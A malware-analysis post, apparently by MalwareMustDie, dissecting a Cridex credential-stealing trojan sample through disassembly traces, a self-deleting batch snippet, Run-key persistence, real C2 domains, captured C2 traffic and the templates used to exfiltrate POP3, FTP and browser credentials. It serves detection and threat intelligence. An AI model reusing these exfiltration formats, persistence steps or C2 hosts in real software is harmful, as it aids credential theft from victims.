Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #------------------------------------------------------------------
- # MalwareMustDie | Analysis of Malware Trojan/PWS Win32/Cridex
- $ @unixfreaxjp Thursday January 16 2014 -- 02:55:48 +02:00
- # hash:
- MD5 ebb6072a86ad2496040d1bdd7d12a265
- SHA1 027d4d22faf25086040bc779360642c8faab2297
- # VT: https://www.virustotal.com/en/file/11643af5fef0079ce95fe2c292e1d8aecfb21dd1afc602f9ca28a8728550809b/analysis/
- # Network Traffic: https://www.mediafire.com/?v69oaie9edu2lo0
- # Additional- Decoded config by Mr. Kyle Yang (Fortinet) http://pastebin.com/766faxPH
- #------------------------------------------------------------------
- // Binary is packed, CRC is wrong
- // Some quick reverse:
- // ASM Traces:
- // Uses Microsoft's Enhanced Cryptographic Provider
- 00407E80 lea eax, dword ptr [esp+04h]
- 00407E84 push eax
- 00407E85 push ecx
- 00407E86 push 00000000h
- 00407E88 push 00000001h
- 00407E8A push 00000000h
- 00407E8C push edx
- 00407E8D call dword ptr [00411044h] CryptDecrypt@ADVAPI32.DLL (Import, 6 Params)
- 00407E93 ret function end
- // Anti debug
- 00390426 call dword ptr [esi+08h] LdrLoadDll@NTDLL.DLL (Import, Hidden, 4 Params)
- 00404360 call dword ptr [00411138h] GetProcessHeap@KERNEL32.DLL (Import, 0 Params)
- // Simple attempt for (suspected as) VM detection method:
- 004050AF call dword ptr [004111DCh] PathCombineW@SHLWAPI.DLL (Import, 3 Params)
- 004050BB call dword ptr [004110D8h] FindFirstFileW@KERNEL32.DLL (Import, 2 Params)
- 00405147 call dword ptr [004111DCh] PathCombineW@SHLWAPI.DLL (Import, 3 Params)
- 00405161 call dword ptr [004111E0h] wnsprintfA@SHLWAPI.DLL (Import, Unknown Params)
- 00405196 call dword ptr [004110F0h] FindNextFileW@KERNEL32.DLL (Import, 2 Params)
- 004051A5 call dword ptr [004111C8h] FindClose@KERNEL32.DLL (Import, 1 Params)
- // Attempt to self copy:
- 004010C7 push 0042355Ch ASCII "C:\ghfwhe\pvLxggf\tqPUnrp\oaiQtp\MFhvyp.cia"
- 004010CC push 00423530h ASCII "C:\kblTpDb\wgiq\ckblqOQGx\piFnr\SMPgwYGn"
- 004010D1 call dword ptr [0041C02Ch] CopyFileA@KERNEL32.DLL (Import, Hidden, 3 Params)
- 004010D7 mov dword ptr [00423588h], eax
- 004010DC lea eax, dword ptr [004234D8h] UTF-16 "C:\utjDet\dvwtc\txfLv\hjuvaq" (Hidden)
- 004010E2 mov dword ptr [004235C8h], eax
- 004010E7 push dword ptr [004235C8h]
- 004010ED mov eax, dword ptr [004235A0h] 0x00000000
- 004010F2 mov dword ptr [ebp-34h], eax
- 004010F5 push dword ptr [ebp-34h]
- 004010F8 mov dword ptr [004235CCh], eax
- 004010FD push dword ptr [004235CCh]
- 00401103 push dword ptr [004235D0h]
- 00401109 mov dword ptr [ebp-38h], eax
- 0040110C push dword ptr [ebp-38h]
- 0040110F push dword ptr [004235D4h]
- 00401115 push dword ptr [004235D8h]
- 0040111B push 0042359Ch ASCII "NUL"
- 00401120 call dword ptr [0041C018h] CreateFileA@KERNEL32.DLL (Import, Hidden, 7 Params)
- // Seeking further...
- // Batch file for self copy:
- @echo off
- :R
- del /F /Q /A "C:\%sample%.exe"
- if exist "C:\%sample%.exe" goto R
- del /F /Q /A "%TEMP%\exp1.tmp.bat"
- // Drops w/file format:
- KB%08d.exe (i.e. 4168e4 -> "KB00161095.exe")
- // Self duplication flooded the test bed:
- sample.exe (PID: 2032 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 1400 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp1.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00161095.exe (PID: 1236 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 1268 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp2.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00082345.exe (PID: 1892 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 488 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp3.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00731095.exe (PID: 1832 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 1776 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp4.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB01378595.exe (PID: 1168 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 1528 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp5.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00942141.exe (PID: 1320 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 1772 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp6.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00003595.exe (PID: 352 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 900 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp7.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00029540.exe (PID: 2000 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 424 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp8.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00854540.exe (PID: 220 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 1060 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp9.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB01150790.exe (PID: 632 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 2024 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expA.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB01044540.exe (PID: 1584 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 2472 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expB.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB01193090.exe (PID: 2176 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 2852 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expC.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00740891.exe (PID: 3528 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 2928 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expD.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00668290.exe (PID: 2792 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 3408 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expE.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00616461.exe (PID: 868 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 3340 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expF.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB01448595.exe (PID: 3220 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 3984 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp10.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00933391.exe (PID: 3860 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 596 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp11.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00234437.exe (PID: 896 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 2484 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp12.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00688187.exe (PID: 2404 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 3172 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp13.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00677040.exe (PID: 3180 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- // Autostart:
- Software\Microsoft\Windows\CurrentVersion\Run
- // Detect browsers:
- 4112d8 -> firefox.exe
- 4112f0 -> explorer.exe
- 4112c0 -> chrome.exe
- // This is the cyvber crime evidence part....
- // CNC LIST:
- h00p://portasible.ru
- h00p://ssshsecur.ru
- h00p://glebstark.ru
- h00p://kuchereneltd.ru
- // CNC Request:
- POST /PHVxGBAAAAA/yir2HD/99ocWCAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: kuchereneltd.ru
- Content-Length: 338
- Connection: Keep-Alive
- Cache-Control: no-cache
- 000000E0 0a .
- 000000E1 8d 6c 6d d8 7b 67 37 69 bd 95 d2 34 30 ca 6b 51 .lm.{g7i ...40.kQ
- 000000F1 9e a4 d2 11 b3 27 27 36 bb 12 c2 b8 82 29 35 f4 .....''6 .....)5.
- 00000101 c4 4e 50 5b 54 cb 89 7d b0 97 63 43 cc 00 81 8b .NP[T..} ..cC....
- 00000111 fa 46 0b 3b e7 29 0d ac 9e 75 12 f1 95 a6 70 dd .F.;.).. .u....p.
- 00000121 af a8 9d 09 7e fd 3a a6 92 c9 b7 96 78 d7 79 bf ....~.:. ....x.y.
- 00000131 25 90 51 dd 1b 30 41 df a2 53 83 56 f5 bd bf ea %.Q..0A. .S.V....
- 00000141 69 aa ef fa db d1 05 c9 ca f5 44 ae e2 df 58 d5 i....... ..D...X.
- 00000151 28 36 31 a4 57 f4 b0 a6 79 c8 f9 d9 42 18 ae 96 (61.W... y...B...
- 00000161 e9 e2 cf f7 c9 9f 50 f9 67 48 e7 49 8b 4b 90 5f ......P. gH.I.K._
- 00000171 fc eb 77 82 89 df 13 7a 09 f3 b1 96 69 26 cd ad ..w....z ....i&..
- 00000181 9b 64 b8 49 eb 3f 35 d7 a5 50 b9 e2 f0 c4 49 6c .d.I.?5. .P....Il
- 00000191 d3 97 85 76 76 88 2d 61 2d 2f e5 8d 5a 7a 4c 59 ...vv.-a -/..ZzLY
- 000001A1 90 68 5a ab 96 db 9c b3 41 51 ed f0 94 2b f8 8a .hZ..... AQ...+..
- 000001B1 8c c8 a0 b4 79 4c bc 5a 93 ee 5f 4f 1e 2f 5e aa ....yL.Z .._O./^.
- 000001C1 20 9b 8c 5c d4 f1 bb f0 b0 b1 d4 e6 6d 67 35 6f ..\.... ....mg5o
- 000001D1 3c 94 1c 6a 5e 1d fb ce 49 80 81 3a 77 4d 72 94 <..j^... I..:wMr.
- 000001E1 c6 15 6d 00 9d d9 fe 98 af 80 19 6d 1f c6 c6 0e ..m..... ...m....
- 000001F1 fe 5a 61 16 dc 1f ca b1 77 c3 2e 95 97 8e 3d f2 .Za..... w.....=.
- 00000201 91 24 df 99 e4 cb 13 35 76 20 4d cd 21 91 13 42 .$.....5 v M.!..B
- 00000211 67 ac 49 85 cb 5e 3e b1 8d c0 e4 13 6a dc ad 61 g.I..^>. ....j..a
- 00000221 7f 68 0d c4 e4 27 85 00 89 58 dc 57 b9 6d 4c 98 .h...'.. .X.W.mL.
- 00000231 4d 93 M.
- // HTTP POST SENT FORMAT:
- // headers written in binary (for IOC or YARA)
- Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- HTTP/1.1 200 OK Connection: close
- application/x-www-form-urlencoded
- multipart/form-data
- Content-Disposition: attachment; filename=%S
- // CNC/Botnet Related commands:
- formgrabber
- commands
- allow
- deny
- redirect
- https
- bconnect
- type
- settings
- actions
- httpinjects
- pattern
- process
- send
- exec
- socket
- select
- httpshots
- closesocket
- // Two HTTP methods connectivity traced:
- HTTP/1.1
- HTTP/1.0
- // CREDENTIAL STEALER TEMPLATE
- // template used to sent credentials withot credential/before encrypted:
- 4118b0 -> <message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u"> // Opearing system
- <header>
- <unique>%%.%us</unique>
- <version>%%u</version>
- <system>%%u</system>
- <network>%%u</network>
- </header><data>
- 411a3c -> </data></message>
- 411730: <pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server> //pop3 mail
- <user><![CDATA[%%.%us]]></user><pass><![CDATA[
- 4117a4 -> ]]></pass></pop3>
- 411850: <ff time="%u"><data><![CDATA[ // firefox
- 411870: ]]></data></ff>
- 411880: <mm time="%u"><data><![CDATA[ // mm? macromedia?
- 4118a0 -> ]]></data></mm>
- 4117d0: <cert time="%u"><pass><![CDATA[ // certification/pwd
- 4117f0: ]]></pass><data><![CDATA[
- 41180c -> ]]></data></cert>
- 411648: <httpshot time="%%%uu"><url><![CDATA[%%.%us]]></url><data><![CDATA[ //links
- 41168c -> ]]></data></httpshot>
- 4116a8: <ftp time="%%%uu"><server> // FTP credential sender format:
- <![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
- <user><![CDATA[%%.%us]]></user><pass><![CDATA[
- 41171c: ]]></pass></ftp>
- 4115c8: <http time="%%%uu"> // links
- <url><![CDATA[%%.%us]]></url>
- <useragent><![CDATA[%%.%us]]></useragent><data><![CDATA[
- 411634 -> ]]></data></http>
- 411820: <ie time="%u"><data><![CDATA[
- 411840 -> ]]></data></ie>
- // CNC Response
- HTTP/1.1 200 OK
- Server: nginx/1.2.1
- Date: Wed, 15 Jan 2014 23:09:22 GMT
- Content-Type: text/html
- Transfer-Encoding: chunked
- Connection: keep-alive
- X-Powered-By: PHP/5.4.4-14+deb7u7
- Vary: Accept-Encoding
- 000000D0 0d 0a 0d 0a 62 36 38 37 0d 0a 1e 06 31 bd 7f b1 ....b687 ....1...
- 000000E0 66 f9 5e c2 33 44 02 05 c3 71 7c 6e ff 4d 12 93 f.^.3D.. .q|n.M..
- 000000F0 a7 a6 28 ae 99 db dc d0 77 fc e6 66 c2 f0 15 5d ..(..... w..f...]
- 00000100 d9 e2 5f ab 92 11 2a 51 4d ca f4 17 e8 b9 a2 96 .._...*Q M.......
- 00000110 d9 1e 40 1f 87 00 76 f2 d8 e9 14 4c 1f 1f 30 97 ..@...v. ...L..0.
- 00000120 68 52 14 af 87 63 19 80 06 8e 04 77 6e 48 c9 ca hR...c.. ...wnH..
- 00000130 5f b9 db 8a 40 b7 74 e0 93 4a 0a 9e 55 b8 14 b8 _...@.t. .J..U...
- 00000140 5c ba ce c8 80 6b fb d3 c2 66 72 ec 65 aa bf f6 \....k.. .fr.e...
- 00000150 fe 3c 42 74 8c e7 27 b1 39 a9 da 39 a3 ee 5e 6b .<Bt..'. 9..9..^k
- 00000160 4b 0d 32 55 bf ef 95 60 18 90 af d8 07 09 89 c2 K.2U...` ........
- 00000170 17 6a 11 f7 a2 cd 75 26 cd ad b0 65 b7 5d f0 22 .j....u& ...e.]."
- 00000180 7f 94 f6 4a e1 b1 97 d1 1d 28 da d0 80 64 66 9e ...J.... .(...df.
- [...]
- 0000B6B8 6d 13 6c 3f f1 15 1c f5 d2 75 f7 3c ca 66 f9 18 m.l?.... .u.<.f..
- 0000B6C8 c9 80 a0 7f 4b 07 01 e7 3b b7 d8 0f a0 ce 3a 1e ....K... ;.....:.
- 0000B6D8 5c 58 9f 2d e8 98 fe 23 b1 06 ab 96 94 9c 84 1e \X.-...# ........
- 0000B6E8 09 e5 10 11 28 05 61 c8 a4 96 22 b8 4f 10 5a 57 ....(.a. ..".O.ZW
- 0000B6F8 c8 2e 23 2b 91 ad 16 fe 92 9c 5d e4 57 0c b6 bb ..#+.... ..].W...
- 0000B708 0a 47 bf 77 30 c2 01 e7 c4 7f b1 a0 5c 8c 70 4b .G.w0... ....\.pK
- 0000B718 6f e0 72 8e 2a 40 8a 10 c9 f0 f0 78 cf 09 c3 8b o.r.*@.. ...x....
- 0000B728 d2 a0 20 78 18 92 46 67 eb 86 d8 03 9c 30 96 da .. x..Fg .....0..
- 0000B738 46 05 ad 52 65 b6 d8 41 d3 52 5a d5 21 f9 64 54 F..Re..A .RZ.!.dT
- 0000B748 08 7d b1 83 73 8a ee a1 77 f8 fb f0 2a 82 cf 94 .}..s... w...*...
- 0000B758 df c2 94 7c 87 d6 6e 18 a4 0d 0a 30 0d 0a 0d 0a ...|..n. ...0....
- // One Domain used as CNC is CURRENTLY ALIVE!!
- FYI, one of the domains still active serving malware:
- $ date
- Thu Jan 16 11:09:48 JST 2014
- $ dig kuchereneltd.ru
- ; <<>> DiG 9.2.5 <<>> kuchereneltd.ru
- ;; global options: printcmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17040
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 10
- ;; QUESTION SECTION:
- ;kuchereneltd.ru. IN A
- ;; ANSWER SECTION:
- kuchereneltd.ru. 3600 IN A 94.76.240.56
- ;; AUTHORITY SECTION:
- kuchereneltd.ru. 3600 IN NS ns2.reg.ru.
- kuchereneltd.ru. 3600 IN NS ns1.reg.ru.
- ;; ADDITIONAL SECTION:
- ns2.reg.ru. 2518 IN A 31.31.205.74
- ns2.reg.ru. 2518 IN A 88.212.207.122
- ns2.reg.ru. 2518 IN A 198.100.149.22
- ns2.reg.ru. 2518 IN A 31.31.205.56
- ns1.reg.ru. 3046 IN A 31.31.205.73
- ns1.reg.ru. 3046 IN A 31.31.204.25
- ns1.reg.ru. 3046 IN A 31.31.204.37
- ns1.reg.ru. 3046 IN A 31.31.204.52
- ns1.reg.ru. 3046 IN A 31.31.205.39
- ns1.reg.ru. 3046 IN A 31.31.205.55
- ;; Query time: 275 msec
- ;; SERVER: 202.238.95.24#53(202.238.95.24)
- ;; WHEN: Thu Jan 16 11:09:13 2014
- ;; MSG SIZE rcvd: 249
- domain: KUCHERENELTD.RU
- nserver: ns1.reg.ru.
- nserver: ns2.reg.ru.
- state: REGISTERED, DELEGATED, UNVERIFIED
- person: Private Person
- registrar: REGRU-REG-RIPN
- admin-contact: http://www.reg.ru/whois/admin_contact
- created: 2014.01.06
- paid-till: 2015.01.06
- free-date: 2015.02.06
- source: TCI
- Last updated on 2014.01.16 06:06:36 MSK
- $ myget -d kuchereneltd.ru
- GET / HTTP/1.1
- Accept: */*
- Host: kuchereneltd.ru
- Server: nginx/1.2.1
- Date: Thu, 16 Jan 2014 02:26:47 GMT
- Content-Type: text/html
- Transfer-Encoding: chunked
- Connection: keep-alive
- ---
- #MalwareMustDie!
- " Thou shalt not steal.."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement